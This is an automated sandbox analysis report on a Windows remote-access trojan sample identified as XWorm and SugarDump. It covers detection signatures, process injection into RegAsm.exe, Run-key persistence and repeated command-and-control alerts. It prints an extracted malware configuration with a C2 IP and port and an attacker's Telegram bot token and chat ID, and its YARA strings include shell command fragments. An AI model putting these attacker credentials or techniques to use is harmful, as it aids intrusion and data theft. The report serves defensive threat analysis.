Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe
Analysis ID:1639673
MD5:0cf12da421ee4ddc57b9f5560cba9a64
SHA1:950c2a34ff280166140d6447c688529d8a13aed0
SHA256:31e63f819a36bc1e4ddca8afbab6997fac0aefd1b7c5628273459f641bbfac85
Tags:exeuser-SecuriteInfoCom
Infos:

Detection

SugarDump, XWorm
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected SugarDump
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to capture screen (.Net source)
Contains functionality to inject code into remote processes
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Potentially Suspicious Malware Callback Communication
Tries to harvest and steal browser information (history, passwords, etc)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe (PID: 7012 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe" MD5: 0CF12DA421EE4DDC57B9F5560CBA9A64)
    • SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe (PID: 6296 cmdline: "C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe" MD5: 0CF12DA421EE4DDC57B9F5560CBA9A64)
      • RegAsm.exe (PID: 5384 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • cmd.exe (PID: 7568 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpB64.tmp.bat"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 7616 cmdline: timeout 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe (PID: 5604 cmdline: "C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe" MD5: 0CF12DA421EE4DDC57B9F5560CBA9A64)
    • RegAsm.exe (PID: 660 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe (PID: 1572 cmdline: "C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe" MD5: 0CF12DA421EE4DDC57B9F5560CBA9A64)
    • MSBuild.exe (PID: 944 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SUGARDUMPAccording to Mandiant, SUGARDUMP is a credential harvesting utility, capable of password collection from Chromium-based browsers. There are also versions to exfiltrate data via SMTP and HTTP.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.sugardump
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm
{"C2 url": ["38.68.49.150"], "Port": 7777, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "7679784649:AAH3qQDuOx-OKMgB6WakdqTj8E2yKjPH8Q8", "Telegram Chatid": "-4763076882", "Version": "XWorm V5.6"}
{"C2 url": "https://api.telegram.org/bot7679784649:AAH3qQDuOx-OKMgB6WakdqTj8E2yKjPH8Q8/sendMessage"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XWorm_1Yara detected XWormJoe Security
    SourceRuleDescriptionAuthorStrings
    00000003.00000002.1453808203.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000003.00000002.1453808203.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x8734:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x87d1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x88e6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x82c6:$cnc4: POST / HTTP/1.1
      00000004.00000003.1030380383.0000000000B73000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000004.00000003.1030380383.0000000000B73000.00000004.00000020.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x82f4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x13574:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x8391:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x13611:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x84a6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x13726:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x7e86:$cnc4: POST / HTTP/1.1
        • 0x13106:$cnc4: POST / HTTP/1.1
        00000003.00000002.1458106841.0000000007C30000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_SugarDumpYara detected SugarDumpJoe Security
          Click to see the 18 entries
          SourceRuleDescriptionAuthorStrings
          7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
            7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
            • 0x5076:$str01: $VB$Local_Port
            • 0x5067:$str02: $VB$Local_Host
            • 0x52d3:$str03: get_Jpeg
            • 0x4d52:$str04: get_ServicePack
            • 0x6154:$str05: Select * from AntivirusProduct
            • 0x6352:$str06: PCRestart
            • 0x6366:$str07: shutdown.exe /f /r /t 0
            • 0x6418:$str08: StopReport
            • 0x63ee:$str09: StopDDos
            • 0x64e4:$str10: sendPlugin
            • 0x6682:$str12: -ExecutionPolicy Bypass -File "
            • 0x67ab:$str13: Content-length: 5235
            7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x6b34:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x6bd1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x6ce6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x66c6:$cnc4: POST / HTTP/1.1
            3.2.RegAsm.exe.7c30000.2.unpackJoeSecurity_SugarDumpYara detected SugarDumpJoe Security
              4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b729c0.4.unpackJoeSecurity_XWormYara detected XWormJoe Security
                Click to see the 39 entries

                System Summary

                barindex
                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 38.68.49.150, DestinationIsIpv6: false, DestinationPort: 7777, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 5384, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49684
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, ProcessId: 6296, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AutoStartApp
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-16T01:40:05.104185+010028536851A Network Trojan was detected192.168.2.849683149.154.167.220443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-16T01:40:20.413893+010028528701Malware Command and Control Activity Detected38.68.49.1507777192.168.2.849684TCP
                2025-03-16T01:40:20.703994+010028528701Malware Command and Control Activity Detected38.68.49.1507777192.168.2.849684TCP
                2025-03-16T01:40:27.135291+010028528701Malware Command and Control Activity Detected38.68.49.1507777192.168.2.849684TCP
                2025-03-16T01:40:35.032717+010028528701Malware Command and Control Activity Detected38.68.49.1507777192.168.2.849684TCP
                2025-03-16T01:40:49.628427+010028528701Malware Command and Control Activity Detected38.68.49.1507777192.168.2.849684TCP
                2025-03-16T01:40:54.705957+010028528701Malware Command and Control Activity Detected38.68.49.1507777192.168.2.849684TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-16T01:40:13.947183+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:14.056980+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:14.166187+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:14.275279+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:14.384661+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:14.507077+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:14.618978+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:14.754079+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:14.869292+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:15.197563+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:15.306616+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:15.415958+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:15.525200+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:15.634719+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:15.744341+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:15.853578+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:15.962753+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:16.098477+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:16.186847+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:16.306603+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:16.415975+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:16.556674+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:16.665935+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:16.775451+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:16.889673+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:17.009783+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:17.119262+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:17.228683+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:17.350441+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:17.447155+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:17.557756+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:17.667192+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:17.794284+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:17.922896+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:18.041189+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:18.154450+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:18.277537+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:18.486605+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:18.713563+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:18.822458+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:18.931704+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:19.040975+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:19.172001+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:19.307002+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:19.431846+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:19.541025+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:19.650312+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:19.759694+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:19.869357+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:19.978527+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:20.087713+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:20.197259+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:20.326486+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:20.415951+010028529231Malware Command and Control Activity Detected192.168.2.84968438.68.49.1507777TCP
                2025-03-16T01:40:20.415956+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:20.778281+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:20.895722+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:21.052790+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:21.248492+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:21.373981+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:21.479547+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:21.587813+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:21.697317+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:21.806528+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:21.915924+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:22.030093+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:22.134684+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:22.244798+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:22.353571+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:22.462834+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:22.572293+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:22.681616+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:22.790859+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:22.918538+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:23.009724+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:23.119067+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:23.228617+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:23.337842+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:23.469574+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:23.572243+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:23.743001+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:24.145794+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:24.259997+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:24.369126+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:24.478853+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:24.587798+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:24.697405+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:24.806668+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:24.915858+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:25.025376+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:25.134660+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:25.244011+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:25.390554+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:25.462856+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:25.572070+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:25.681566+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:25.806461+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:25.900324+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:26.009663+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:26.119148+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:26.228503+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:26.370607+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:26.448007+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:26.556618+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:26.665987+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:26.775521+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:26.886679+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:26.994035+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:27.103577+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:27.243267+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:27.353434+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:27.462806+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:27.572098+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:27.681578+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:27.791245+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:27.900392+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:28.009660+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:28.119586+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:28.229456+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:28.349979+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:28.462826+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:28.575181+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:28.681662+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:28.790865+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:28.900236+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:29.009649+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:29.118971+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:29.228759+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:29.397783+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:29.447567+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:29.556828+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:29.665938+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:29.780769+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:29.884759+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:29.994287+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:30.108683+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:30.212769+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:30.328599+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:30.467644+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:30.572417+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:30.704564+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:30.954507+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:31.056486+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:31.165869+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:31.275165+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:31.384678+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:31.493949+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:31.612951+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:31.712721+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:31.822224+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:31.931542+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:32.040909+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:32.155443+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:32.259807+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:32.373210+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:32.478398+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:32.588030+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:32.697402+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:32.806566+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:32.916251+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:33.025229+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
